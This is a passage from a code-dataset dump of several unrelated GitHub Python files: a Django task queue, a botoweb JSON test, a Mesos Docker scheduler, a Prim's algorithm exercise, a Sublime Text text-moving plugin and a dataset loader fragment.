open('local_config.json') as file:\n _data = load(file)\n for key, val in _data.items():\n ans[key] = val\n except FileNotFoundError:\n pass\n\n return ans\n\n\ndef error_handler_for_http_answer(func):\n \"\"\"\n Декоратор обработки ошибок для функций ответа на запросы\n Если в процессе выполнения потенциально опасного кода вызвался Exception, будет возвращено описание ошибки и код 502\n :param func:\n :return:\n \"\"\"\n\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except Exception as E:\n logging.error(str(E))\n print(\"Error:\", E)\n return str(E), 502\n\n return wrapper\n\n\ndef banchmark(iters=1, active=True):\n def wrapper(func):\n def wrapper2(*args, **kwargs):\n if active is True:\n total = 0\n for i in range(iters):\n start = time()\n ans = func(*args, **kwargs)\n end = time()\n total += end - start\n print('Среднее время выполнения функции:', total / iters)\n\n return func(*args, **kwargs)\n\n return wrapper2\n\n return wrapper\n","repo_name":"dr3al/REST_chatService","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"75115914549","text":"# NOTE: these tests need to be executed from the root\n# directory of an svn checkout using py.test\n\nimport boto\nimport time\nimport sys;sys.path.append(\"\")\nimport botoweb;botoweb.set_env(\"example\")\n\nfrom botoweb.appserver.handlers.db import JSONWrapper\nfrom botoweb.db.model import Model\nfrom botoweb.db.property import StringProperty, ReferenceProperty, IntegerProperty\ntry:\n\timport json\nexcept ImportError:\n\timport simplejson as json\n\nclass ExampleModel(Model):\n\t\"\"\"Test Model 
object\"\"\"\n\t# Test all the regular properties\n\tname = StringProperty(verbose_name=\"Name\")\n\tparent = ReferenceProperty(Model, verbose_name=\"Parent Object\")\n\tnumber = IntegerProperty(verbose_name=\"Integer Property\")\n\n\t# This property is advertantly set to \"None\" by default,\n\t# and should come out as a null object, not a string\n\tsome_null = StringProperty(verbose_name=\"Some Null property\", default=\"None\")\n\n\nclass TestJSON(object):\n\t\"\"\"Test the JSON Serialization through the DB Handler\n\tThis doesn't actually launch a botoweb instance, instead\n\tit calls the JSONWrapper directly\"\"\"\n\n\tdef setup_class(cls):\n\t\t\"\"\"Setup this class\"\"\"\n\t\tobj = ExampleModel()\n\t\tobj.id = \"TEST\"\n\t\tobj.name = \"Some Name\"\n\t\tobj.number = 1\n\n\t\tobj2 = ExampleModel()\n\t\tobj2.id = \"TEST-PARENT\"\n\t\tobj2.name = \"Second Name\"\n\t\tobj2.number = 2\n\t\tobj2.parent = obj\n\n\t\tobj.parent = obj2\n\n\n\t\tcls.objs = [obj, obj2]\n\t\tcls.wrapper = JSONWrapper(iter([obj, obj2]), user=None)\n\n\tdef teardown_class(cls):\n\t\t\"\"\"Cleanup\"\"\"\n\t\tpass\n\n\tdef test_fetch(self):\n\t\t\"\"\"Test Fetching one item\"\"\"\n\t\tobj = json.loads(self.wrapper.next())\n\t\treal_obj = self.objs[0]\n\t\tassert(obj['__id__'] == real_obj.id)\n\t\tassert(obj['__type__'] == real_obj.__class__.__name__)\n\t\tassert(obj['name'] == real_obj.name)\n\t\tassert(obj['number'] == real_obj.number)\n\t\tassert(obj['some_null'] == None)\n\n\t\t# Check the parent object\n\t\tobj2 = obj['parent']\n\t\treal_obj2 = self.objs[1]\n\t\tassert(obj2['__type__'] == real_obj2.__class__.__name__)\n\t\tassert(obj2['__id__'] == real_obj2.id)\n\n\tdef test_fetch_again(self):\n\t\t\"\"\"Test fetching again\"\"\"\n\t\tobj = json.loads(self.wrapper.next())\n\t\treal_obj = self.objs[1]\n\t\tassert(obj['__id__'] == real_obj.id)\n\n\tdef test_put_valid(self):\n\t\t\"\"\"Test putting an object via JSON\"\"\"\n\t\tpass\n","repo_name":"boto/botoweb","sub_path":"tests/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"2361518609","text":"import threading\nfrom django.http import JsonResponse\nfrom random import uniform\nfrom math import sqrt\nfrom threading import Thread\nfrom time import sleep, time\nimport logging\n\nfrom ulid import ULID\n\n'''\nlistando: curl http://localhost:8000/norm/\n\nregistrando tarefa: curl http://localhost:8000/norm/1000000000/\n'''\n\n\n\nlogger = logging.getLogger('__name__')\n\ntask_queue = []\n\nclass NormError(Exception): ...\n\nclass EmpetyQueueError(Exception): ...\n\n\nclass Task:\n\n def __init__(self, size):\n self.id = str(ULID())\n self.size = size\n self.status = 'Scheduled'\n self.result = None\n self.time = None\n\n def to_dict(self):\n return {\n 'id': str(self.id),\n 'size': self.size,\n 'status': self.status,\n 'result': self.result,\n 'time': self.time,\n }\n\n\nclass Queue:\n\n def __init__(self):\n self._tasks_to_do = []\n self._tasks_running = []\n self._tasks_processed = []\n self._start_threads = False\n\n def find(self, id):\n for t in self._tasks:\n if t.id == id:\n return t\n\n def all(self):\n return [t.to_dict() for t in self._tasks_to_do + self._tasks_processed + self._tasks_running]\n\n def start_threads(self, number_of_threads=2):\n self._start_threads = True\n for _ in range(number_of_threads):\n Thread(target=consumer, args=(tasks,)).start()\n\n @property\n def there_are_no_thread_yet(self):\n 
return not self._start_threads\n\n @property\n def tasks_todo(self):\n return self._tasks_to_do\n\n @property\n def tasks_running(self):\n return self._tasks_running\n\n def register(self, task):\n self._tasks_to_do.append(task)\n\n def processed(self, task):\n self._tasks_running.remove(task)\n self._tasks_processed.append(task)\n\n def get_new_tasks(self):\n try:\n task = self._tasks_to_do.pop()\n self._tasks_running.append(task)\n return task\n except IndexError:\n raise EmpetyQueueError\n\n\ntasks = Queue()\n\ndef consumer(tasks):\n while True:\n logger.info('Quantidade de tasks todo: %d' % len(tasks.tasks_todo))\n logger.info('Quantidade de tasks runnning: %d' % len(tasks.tasks_running))\n try:\n task = tasks.get_new_tasks()\n\n init = time()\n worker(task)\n task.time = time() - init\n\n tasks.processed(task)\n except EmpetyQueueError:\n sleep(10)\n continue\n\n\ndef worker(task):\n task.status = 'running ...'\n try:\n result = norm(size=task.size)\n task.result = result\n task.status = 'done'\n except NormError:\n task.status = 'fail.'\n\n\ndef norm(size=10000):\n\n if size == 101:\n raise NormError\n\n x = (uniform(-0.1, 0.1) for _ in range(size))\n\n return sqrt(sum(a**2 for a in x))\n\n\ndef register(request, size):\n\n if tasks.there_are_no_thread_yet:\n tasks.start_threads()\n\n task = Task(size)\n tasks.register(task)\n return JsonResponse({'task_id': task.id})\n\n\ndef list_tasks(request):\n\n logger.warning('Quantidade de tasks runnning: %d' % len(tasks.tasks_running))\n list_ = tasks.all()\n\n return JsonResponse({'result': list_})\n\n\ndef number_of_threads(request):\n return JsonResponse({'threads_number': threading.active_count()})\n","repo_name":"HenriqueCCdA/DjangoLab","sub_path":"lab/cal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42565117920","text":"#!/usr/bin/env python\nimport random\nimport sys\nimport logging\nimport uuid\nimport signal\nfrom mesos.interface import Scheduler, mesos_pb2\nfrom mesos.native import MesosSchedulerDriver\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nTASK_CPUS = 0.5\nTASK_MEM = 1024\nRUNNING_TASKS = 5\n\n\ndef get_available_port(offer):\n logging.info(offer.resources[3])\n begin = offer.resources[3].ranges.range[0].begin\n end = offer.resources[3].ranges.range[0].end\n logging.info(\"Port range [%s:%s]\", begin, end)\n return random.randint(begin, end)\n\n\ndef new_task(offer, name, cmd):\n task = mesos_pb2.TaskInfo()\n task.task_id.value = str(uuid.uuid4())\n task.slave_id.value = offer.slave_id.value\n task.name = name\n task.command.value = cmd\n\n cpus = task.resources.add()\n cpus.name = \"cpus\"\n cpus.type = mesos_pb2.Value.SCALAR\n cpus.scalar.value = TASK_CPUS\n\n mem = task.resources.add()\n mem.name = \"mem\"\n mem.type = mesos_pb2.Value.SCALAR\n mem.scalar.value = TASK_MEM\n\n return task\n\n\ndef new_docker_task(offer, name, cmd, image):\n task = new_task(offer, name, cmd)\n\n container = mesos_pb2.ContainerInfo()\n container.type = 1\n\n docker = mesos_pb2.ContainerInfo.DockerInfo()\n docker.image = image\n docker.network = 2\n docker.force_pull_image = True\n\n mesos_ports = task.resources.add()\n mesos_ports.name = \"ports\"\n mesos_ports.type = mesos_pb2.Value.RANGES\n available_port = get_available_port(offer)\n logging.info(\"Port assignment: %s\", available_port)\n port_range = mesos_ports.ranges.range.add()\n port_range.begin = available_port\n port_range.end = 
available_port\n docker_port = docker.port_mappings.add()\n docker_port.host_port = available_port\n docker_port.container_port = 8080\n\n container.docker.MergeFrom(docker)\n task.container.MergeFrom(container)\n\n return task\n\n\ndef max_tasks_to_run_with_offer( offer):\n logging.info(\"CPUs: %s MEM: %s\",\n offer.resources[0].scalar.value,\n offer.resources[1].scalar.value)\n\n cpu_tasks = int(offer.resources[0].scalar.value/TASK_CPUS)\n mem_tasks = int(offer.resources[1].scalar.value/TASK_MEM)\n # offer.resources[2] would be disk\n try:\n port_tasks = int(offer.resources[3].ranges.range[0].end - offer.resources[3].ranges.range[0].begin)\n except IndexError:\n port_tasks = 0\n max_tasks = cpu_tasks if cpu_tasks <= mem_tasks else mem_tasks\n\n return max_tasks if max_tasks <= port_tasks else port_tasks\n\n\ndef shutdown(signal, frame):\n logging.info(\"Shutdown signal\")\n driver.stop()\n time.sleep(5)\n sys.exit(0)\n\n\nclass HelloWorldScheduler(Scheduler):\n def __init__(self):\n self.runningTasks = 0\n '''\n Called when the scheduler successfully registers with a Mesos master\n Contains a unique Framework ID generate by the master\n '''\n def registered(self, driver, framework_id, master_info):\n logging.info(\"Registered with framework id: %s on: %s\",\n framework_id, master_info.hostname)\n\n def resourceOffers(self, driver, offers):\n logging.info(\"Recieved resource offers: %s\",\n [o.id.value for o in offers])\n tasks_to_start = RUNNING_TASKS - self.runningTasks\n for offer in offers:\n if RUNNING_TASKS <= self.runningTasks:\n driver.declineOffer(offer.id)\n return\n count_tasks = max_tasks_to_run_with_offer(offer)\n start_tasks = count_tasks if count_tasks <= tasks_to_start else tasks_to_start\n tasks_to_start -= start_tasks\n\n if start_tasks <= 0:\n logging.info(\"Decline Offer %s\", offer.id)\n driver.declineOffer(offer.id)\n return\n\n logging.info(\"Start %s tasks\", start_tasks)\n tasks = []\n for i in range(start_tasks):\n task = new_docker_task(offer,\n \"Docker python \",\n \"python3 -m http.server 8080\",\n \"python:3\")\n logging.info(\"Added task %s \"\n \"using offer %s.\",\n task.task_id.value,\n offer.id.value)\n tasks.append(task)\n logging.info(\"Launch %s Tasks\", len(tasks))\n driver.launchTasks(offer.id, tasks)\n\n def statusUpdate(self, driver, update):\n '''\n when a task is started, over,\n killed or lost (slave crash, ....), this method\n will be triggered with a status message.\n '''\n logging.info(\"Task %s is in state %s\" %\n (update.task_id.value,\n mesos_pb2.TaskState.Name(update.state)))\n\n if update.state == mesos_pb2.TASK_RUNNING:\n self.runningTasks += 1\n logging.info(\"Running tasks: %s\", self.runningTasks)\n return\n\n if update.state != mesos_pb2.TASK_RUNNING or\\\n update.state != mesos_pb2.TASK_STARTING or\\\n update.state != mesos_pb2.TASK_STAGING:\n self.runningTasks -= 1\n logging.info(\"Running tasks: %s\", self.runningTasks)\n\n\ndef shutdown(signal, frame):\n logging.info(\"Shutdown signal\")\n driver.stop()\n time.sleep(5)\n sys.exit(0)\n\nif __name__ == '__main__':\n framework = mesos_pb2.FrameworkInfo()\n framework.user = \"\" # Have Mesos fill in the current user.\n framework.name = \"hello-world\"\n helloWorldScheduler = HelloWorldScheduler()\n driver = MesosSchedulerDriver(\n helloWorldScheduler,\n framework,\n \"zk://localhost:2181/mesos\" # assumes running on the master\n )\n driver.start()\n logging.info(\"Listening for Ctrl-C\")\n signal.signal(signal.SIGINT, shutdown)\n while True:\n time.sleep(5)\n 
    sys.exit(0)\n","repo_name":"inovex/GridKA-SDDC-2015","sub_path":"Framework/exercises/docker_ports.py","file_name":"docker_ports.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"}
{"seq_id":"38492277821","text":"# Prim's algorithm\n# 6 11\n# 0 1 32\n# 0 2 31\n# 0 5 60\n# 0 6 51\n# 1 2 21\n# 2 4 46\n# 2 6 25\n# 3 4 34\n# 3 5 18\n# 4 5 40\n# 4 6 51\n\ndef prim():\n    U = []  # set of visited vertices, empty at first\n    D = [1e10] * V  # initialize distances with infinity\n    s = [-1] * V  # parent array (declared but unused)\n\n    D[0] = 0  # pick the start vertex\n    while len(U) < V:\n        minV = 1e10\n        for i in range(V):\n            if i in U:\n                continue  # skip vertices already taken when finding the minimum\n            if minV > D[i]:\n                minV = D[i]\n                v = i\n\n        # 1. find the index v with the smallest value in D,\n        #    considering only vertices not yet in U\n\n        # 2. add v to U\n        U.append(v)\n\n        # 3. update D[w] to the best value for every w connected to v,\n        #    considering only vertices not yet in U\n        for w in range(V):\n            if w in U: continue\n            if G[v][w]:  # a nonzero weight means the vertices are connected\n                D[w] = min(D[w], G[v][w])\n\n\n    print(D)\n    print(U)\n\n\nV, E = map(int, input().split())\nV += 1\nG = [[0]*V for _ in range(V)]\nfor _ in range(E):\n    v1, v2, w = map(int, input().split())\n    G[v1][v2] = w\n    G[v2][v1] = w\n\nprim()\n# print(G)\n\n# the result D holds the smallest edge weight chosen for each vertex\n\n\n\n","repo_name":"tsmich926/ssafy_0404","sub_path":"2_prim.py","file_name":"2_prim.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"19962107906","text":"import sublime_plugin\nimport sublime\nfrom sublime import Region\n\n\ndef generic_line_regions_from_pt(view, pt):\n    line = view.line(pt)\n    line_string = view.substr(line)\n\n    i = 0\n    while i < len(line_string) and line_string[i] == ' ':\n        i += 1\n\n    if i < len(line_string):\n        j = 0\n        while j < len(line_string) and line_string[-1 - j] == ' ':\n            j += 1\n        assert i + j < len(line_string)\n        assert line.begin() + i < line.end() - j\n        source = Region(line.begin() + i, line.end() - j)\n\n    else:\n        j = 0\n        source = None\n\n    return line, source\n\n\ndef move_pt_via_sublime(view, pt, by, forward):\n    assert by in ['char', 'subword', 'word', 'bigword']\n\n    if by == 'char':\n        return min(view.size(), pt + 1) if forward else max(0, pt - 1)\n\n    if by == 'bigword':\n        by = 'word'\n\n    assert by in ['subword', 'word']\n\n    by = by + \"_ends\" if forward else by + \"s\"\n\n    regions = view.sel()\n    regions_copy = list(regions)\n    regions.clear()\n    regions.add(Region(pt))\n\n    view.run_command(\"move\", {\"forward\": forward, \"by\": by})\n\n    to_return = regions[0].a\n    regions.clear()\n    regions.add_all(regions_copy)\n\n    return to_return\n\n\nclass CutSelection():\n    def __init__(self, view, edit, r, by):\n        self.view = view\n        self.edit = edit\n        self.by = by\n\n        assert self.by in ['line', 'char', 'subword', 'word', 'bigword', 'eol', 'bol']\n\n        self.horizontal = self.by != 'line'\n        self.vertical = not self.horizontal\n\n        if r.size() == 0 and self.vertical:\n            self.starter_region = view.full_line(r.a)\n            self.caret_within_line = r.a - self.starter_region.begin()\n\n        else:\n            self.starter_region = r\n            self.caret_within_line = None\n\n        self.string = view.substr(self.starter_region)\n\n        if not self.horizontal:\n            xpos_unit = view.text_to_layout(1)[0]\n            assert xpos_unit != 0\n\n            if r.xpos >= 0 and not self.caret_within_line:\n                self.desired_xpos = r.xpos\n                self.desired_column = (r.xpos / xpos_unit)\n\n            else:\n                self.desired_column = view.rowcol(self.starter_region.begin())[1]\n                self.desired_xpos = self.desired_column * xpos_unit\n\n            print(\"self.desired_column:\", self.desired_column)\n\n        self.row = self.pt = None\n\n    def commit_erasure(self):\n        assert self.pt is None and 
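An aside on the Prim's implementation in the record above: it scans all V vertices to find the minimum on every iteration (O(V^2)). A heap-based variant, shown below with an illustrative adjacency-list graph, reaches the same minimum-spanning-tree weight in O(E log V).

```python
import heapq

def prim_heap(adj, start=0):
    # adj[u] = [(weight, v), ...] -- illustrative adjacency-list format
    visited = set()
    heap = [(0, start)]
    total = 0
    while heap:
        w, u = heapq.heappop(heap)
        if u in visited:
            continue
        visited.add(u)
        total += w
        for weight, v in adj[u]:
            if v not in visited:
                heapq.heappush(heap, (weight, v))
    return total

# example: triangle graph 0-1 (1), 1-2 (2), 0-2 (3) -> MST weight 3
adj = {0: [(1, 1), (3, 2)], 1: [(1, 0), (2, 2)], 2: [(3, 0), (2, 1)]}
assert prim_heap(adj) == 3
```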
self.row is None\n to_return = self.starter_region\n self.view.erase(self.edit, self.starter_region)\n if self.horizontal:\n self.pt = self.starter_region.begin()\n else:\n self.row = self.view.rowcol(self.starter_region.begin())[0]\n self.starter_region = None\n return to_return\n\n def notify_of_erasure(self, r):\n assert self.pt is None and self.row is None and self.starter_region is not None\n assert r.end() <= self.starter_region.begin()\n self.starter_region = Region(self.starter_region.a - r.size(), self.starter_region.b - r.size())\n\n def midway_consistency(self):\n if self.horizontal:\n return self.pt is not None and self.row is None and self.starter_region is None\n return self.pt is None and self.row is not None and self.starter_region is None\n\n def move_vertical(self, forward, num_times=1):\n assert not self.horizontal\n assert self.midway_consistency()\n maxrow, __ = self.view.rowcol(self.view.size())\n if forward:\n self.row = min(maxrow, self.row + num_times)\n else:\n self.row = max(0, self.row - num_times)\n\n def move_horizontal(self, forward, num_times):\n assert self.horizontal\n assert self.midway_consistency()\n\n self.desired_column = None\n self.desired_xpos = None\n\n for i in range(num_times):\n if self.by in ['char', 'subword', 'word', 'bigword']:\n if len(sublime.find_resources(\"GranularSubword.py\")) > 0:\n from GranularSubword.GranularSubword import granular_move_pt\n self.pt = granular_move_pt(self.view, self.pt, self.by, forward)\n\n else:\n self.pt = move_pt_via_sublime(self.view, self.pt, self.by, forward)\n\n else:\n assert num_times == 1\n assert self.by in ['eol', 'bol']\n if self.by == 'eol':\n self.pt = self.view.line(self.pt).end()\n\n else:\n line, source = generic_line_regions_from_pt(self.view, self.pt)\n\n if source and self.pt != source.begin():\n self.pt = source.begin()\n\n else:\n self.pt = line.begin()\n\n def move(self, forward, num_times):\n if self.horizontal:\n self.move_horizontal(forward, num_times)\n\n else:\n self.move_vertical(forward, num_times)\n\n def commit_insertion(self):\n assert self.midway_consistency()\n\n if self.horizontal:\n self.view.insert(self.edit, self.pt, self.string)\n r = Region(self.pt, self.pt + len(self.string))\n self.view.sel().add(r)\n self.pt = None\n\n else:\n pt = self.view.text_point(self.row, 0)\n line = self.view.line(pt)\n\n col = min(line.size(), self.desired_column)\n pt = self.view.text_point(self.row, col)\n copy = list(self.view.sel())\n self.view.insert(self.edit, pt, self.string)\n # nuke and reload... 
(have to because the string insertion erases xpos values)\n self.view.sel().clear()\n self.view.sel().add_all(copy)\n r = Region(pt, pt + len(self.string), self.desired_xpos)\n if self.caret_within_line is not None:\n assert col == 0\n self.view.sel().add(Region(pt + self.caret_within_line))\n else:\n self.view.sel().add(r)\n self.row = None\n\n def notify_of_insertion(self, last_added_string):\n assert self.midway_consistency()\n if self.horizontal:\n self.pt += len(last_added_string)\n\n else:\n self.row += len([x for x in last_added_string if x == '\\n'])\n\n\ndef regions_to_cut_selections(view, edit, by):\n regions = view.sel()\n initial_cuts = []\n cuts = []\n\n for r in regions:\n initial_cuts.append(CutSelection(view, edit, r, by))\n\n regions.clear()\n\n for z in initial_cuts:\n if len(cuts) == 0 or cuts[-1].starter_region.end() <= z.starter_region.begin():\n cuts.append(z)\n\n for index, z in enumerate(cuts):\n r = z.commit_erasure()\n for w in cuts[index + 1:]:\n w.notify_of_erasure(r)\n\n return cuts\n\n\ndef grab_text(view, edit, by, forward=True, num_times=1):\n assert by in ['line', 'char', 'subword', 'word', 'bigword', 'eol', 'bol']\n\n cut_selections = regions_to_cut_selections(view, edit, by)\n\n assert len(view.sel()) == 0\n\n for c in cut_selections:\n c.move(forward, num_times)\n\n for index, c in enumerate(cut_selections):\n c.commit_insertion()\n for q in cut_selections[index + 1:]:\n q.notify_of_insertion(c.string)\n\n\nclass GranularMoveTextUp(sublime_plugin.TextCommand):\n def run(self, edit, num_times=1):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=num_times)\n\n\nclass GranularMoveTextDown(sublime_plugin.TextCommand):\n def run(self, edit, num_times=1):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=num_times)\n\n\nclass GranularMoveTextLeft(sublime_plugin.TextCommand):\n def run(self, edit, by=\"char\"):\n grab_text(self.view, edit, by=by, forward=False)\n\n\nclass GranularMoveTextRight(sublime_plugin.TextCommand):\n def run(self, edit, by=\"char\"):\n grab_text(self.view, edit, by=by, forward=True)\n\n\n# The following are convenience shortcuts:\n\n\nclass GranularMoveTextSubwordLeft(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='subword', forward=False)\n\n\nclass GranularMoveTextSubwordRight(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='subword', forward=True)\n\n\nclass GranularMoveTextToBol(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='bol')\n\n\nclass GranularMoveTextToEol(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by='eol')\n\n\nclass GranularMoveTextUpTenTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=10)\n\n\nclass GranularMoveTextDownTenTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=10)\n\n\nclass GranularMoveTextUpThirtyTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=False, num_times=30)\n\n\nclass GranularMoveTextDownThirtyTimes(sublime_plugin.TextCommand):\n def run(self, edit):\n grab_text(self.view, edit, by=\"line\", forward=True, num_times=30)\n\n\nclass SelectionIsEmptyOrReachesEolBol(sublime_plugin.EventListener):\n def on_query_context(self, view, key, operator, operand, match_all):\n if key != 'selection_is_empty_or_reaches_eol_bol':\n 
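An aside isolating the bookkeeping that notify_of_erasure performs above: once earlier regions are erased from the buffer, every later region's offsets must shift left by the total number of characters already removed. A pure-Python sketch with illustrative names.

```python
def erase_spans(text, spans):
    # spans are non-overlapping (start, end) pairs in the original text
    removed = 0
    for start, end in sorted(spans):
        start -= removed          # shift by what earlier erasures removed
        end -= removed
        text = text[:start] + text[end:]
        removed += end - start
    return text

assert erase_spans("abcdefgh", [(1, 3), (5, 7)]) == "adeh"
```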
return None\n\n        assert operand is True or operand is False\n\n        if operator == sublime.OP_EQUAL:\n            test = self.region_is_empty_or_is_full_lines\n\n        elif operator == sublime.OP_NOT_EQUAL:\n            test = self.region_is_not_full_lines\n\n        else:\n            assert False\n\n        if match_all:\n            return all(test(view, r) == operand for r in view.sel())\n\n        else:\n            return any(test(view, r) == operand for r in view.sel())\n\n    def region_is_empty_or_is_full_lines(self, view, r):\n        if r.a == r.b:\n            return True\n\n        line_a = view.full_line(r.a)\n        line_b = view.full_line(r.b)\n\n        if min(line_a.a, line_b.a) != r.begin():\n            return False\n\n        if max(line_a.a, line_b.a) != r.end():\n            return False\n\n        return True\n\n    def region_is_not_full_lines(self, view, r):\n        return not self.region_is_empty_or_is_full_lines(view, r)\n","repo_name":"youlam/GranularMoveText","sub_path":"GranularMoveText.py","file_name":"GranularMoveText.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"16727848224","text":"import glob\nimport os\nimport re\nimport bisect\nimport json\nimport string\nimport pickle\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport lmdb\nimport torch\n\n\n#class BaseLists:\n#    def file_list(self):\n        #return\n\n\nclass BaseLists:\n    def __init__(self, path):\n        self.path = path\n\n    def file_list(self):\n        raise NotImplementedError\n\n    def read_file(self, image_path):\n        raise NotImplementedError\n\nclass PtFolders(BaseLists):\n    def __init__(self, path):\n        super().__init__(path)\n        search_path = os.path.join(path, '**', '*.pt')\n        self.pt_names = []\n        for i in glob.iglob(search_path, recursive=True):\n            self.pt_names.append(i)\n\n    def file_list(self):\n        return self.pt_names\n\n    def read_file(self, pt_path):\n        return torch.load(pt_path)\n\nclass JsonFolder(BaseLists):\n    def __init__(self, path):\n        super().__init__(path=path)\n        search_path = os.path.join(path, '**', '*.json')\n        self.json_names = []\n        for i in glob.iglob(search_path, recursive=True):\n            self.json_names.append(i)\n\n    def file_list(self):\n        return self.json_names\n\n    def read_file(self, json_path):\n        res = []\n        with open(json_path, 'r') as f:\n            json_data = json.load(f)\n        #print(res.keys())\n        #print(res['nuc']['2175'])\n        #print(len(res['nuc'].keys()))\n        for k, v in json_data['nuc'].items():\n            #print(type(v))\n            #print(v.keys())\n            res.append(v)\n\n        return res\n\nclass ImageFolder(BaseLists):\n    def __init__(self, path):\n        super().__init__(path=path)\n        search_path = os.path.join(path, '**', '*.png')\n        self.image_names = []\n        for i in glob.iglob(search_path, recursive=True):\n            self.image_names.append(i)\n\n    def file_list(self):\n        return self.image_names\n\n    def read_file(self, image_path):\n        image = cv2.imread(image_path, -1)\n        return image\n\n    #def image_list(self):\n    #    return self.image_list()\n    #def read_image(self, image_path):\n    #    image = cv2.imread(image_path, -1)\n    #    return image\n\nclass LMDBFolder(BaseLists):\n    def __init__(self, path):\n        self.env = lmdb.open(path, map_size=1099511627776, readonly=True, lock=False)\n        #with self.env.begin(write=False) as txn:\n        #    self.image_names= [key.decode() for key in txn.cursor().iternext(keys=True, values=False)]\n\n        cache_file = '_cache_' + ''.join(c for c in path if c in string.ascii_letters)\n        cache_path = os.path.join(path, cache_file)\n        if os.path.isfile(cache_path):\n            self.npy_names = pickle.load(open(cache_path, \"rb\"))\n        else:\n            with self.env.begin(write=False) as txn:\n
                self.npy_names = [key for key in txn.cursor().iternext(keys=True, values=False)]\n                pickle.dump(self.npy_names, open(cache_path, \"wb\"))\n\n        self.npy_names = [key.decode() for key in self.npy_names]\n\n    def file_list(self):\n        return self.npy_names\n\n    def read_file(self, npy_path):\n        #image = cv2.imread(image_path, -1)\n        with self.env.begin(write=False) as txn:\n            data = txn.get(npy_path.encode())\n            data = pickle.loads(data)\n        return data\n\nclass BaseDataset:\n    def __init__(self, file_list, image_size):\n        self.file_names = file_list.file_list()\n        self.file_grids = self.construct_grids()\n        self.image_size = image_size\n        self.imagefp2coords = self.image_coords()\n\n        assert image_size % 224 == 0\n        self.border = int(image_size / 224)\n        self.file_list = file_list\n        #self.cum_sums = self.cal_cum_sum()\n        #print(self.cum_sums)\n        #self.\n        #print(self.file_grids.shape)\n        #self.image_clusters = self.cluster_files()\n        #print(image_clusters)\n        #print(len(image_clusters))\n\n    # abstract\n    def image_coords(self):\n        res = {}\n        for k, v in self.file_grids.items():\n            #print(v.shape, v)\n            row, col = v.shape\n            for r_idx in range(row):\n                for c_idx in range(col):\n                    res[v[r_idx, c_idx]] = (r_idx, c_idx)\n\n        return res\n\n    # abstract\n    @property\n    #def image_path_lists(self):\n    def file_path_lists(self):\n        res = []\n        for k, v in self.file_grids.items():\n            if self.border != 1:\n                v = v[:-self.border + 1, :-self.border + 1]\n            res.append(v.flatten())\n\n        return np.hstack(res)\n\n    # not abstract\n    def stich_files(self, files):\n        raise NotImplementedError\n        #def stich_files(self, patch):\n        #    row, col = patch.shape\n        #    h = []\n        #    v = []\n        #    for r_idx in range(row):\n        #        for c_idx in range(col):\n        #            path = patch[r_idx, c_idx]\n        #            image = cv2.imread(path, -1)\n        #            h.append(image)\n        #        image = np.hstack(h)\n        #        #print(image.shape)\n        #        v.append(image)\n        #        h = []\n        #    image = np.vstack(v)\n        #    return image\n        #cv2.hstack\n\n    # abstract\n    def grid_idx(self, file_grid, sample_idx):\n        row, col = file_grid.shape\n        row = row - self.border + 1\n        col = col - self.border + 1\n        r_idx = int(sample_idx / col)\n        c_idx = int(sample_idx % col)\n        return r_idx, c_idx\n\n    # abstract\n    def get_file_by_path(self, path):\n        #if path not in self.imagefp2coords:\n        #    r_idx, c_idx = self.imagefp2coords[os.path.basename(path)]\n        #else:\n        #print(self.imagefp2coords.keys())\n        #    print(self.imagefp2coords.keys()[3])\n        r_idx, c_idx = self.imagefp2coords[path]\n        base_name = os.path.basename(path)\n        #print(base_name)\n        image_prefix = base_name.split('_grade_')[0]\n        file_grid = self.file_grids[image_prefix]\n        patch = file_grid[r_idx : r_idx+self.border, c_idx : c_idx+self.border]\n        #print(patch, self.stich_files)\n        data = self.stich_files(patch)\n        #print(data)\n        return data\n\n    # abstract\n    def assert_data(self, data):\n        raise NotImplementedError\n\n    # abstract\n    def __getitem__(self, idx):\n        image_idx = bisect.bisect_right(self.cum_sum, idx)\n        prefix = self.file_prefixes[image_idx]\n        file_grid = self.file_grids[prefix]\n\n        if image_idx == 0:\n            sample_idx = idx\n        else:\n            sample_idx = idx - self.cum_sum[image_idx - 1]\n\n        r_idx, c_idx = self.grid_idx(file_grid, sample_idx)\n        patch = file_grid[r_idx : r_idx+self.border, c_idx : c_idx+self.border]\n        path = file_grid[r_idx, c_idx]\n        #image = self.stich_files(patch)\n        output = self.stich_files(patch)\n\n        self.assert_data(output)\n        #assert image.shape[0] == self.image_size\n        #assert image.shape[1] == self.image_size\n\n        #return path, image\n        return path, output\n\n    # abstract\n    def __len__(self):\n        return self.cum_sum[-1]\n        #length = 0\n        #for k, v in self.file_grids.items():\n
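An aside on the __getitem__ indexing above, in miniature: cum_sum holds running totals of per-file sample counts, and bisect_right maps a flat dataset index to (file index, index within file). The counts here are illustrative.

```python
import bisect

counts = [4, 2, 5]                      # samples per file (illustrative)
cum_sum = []
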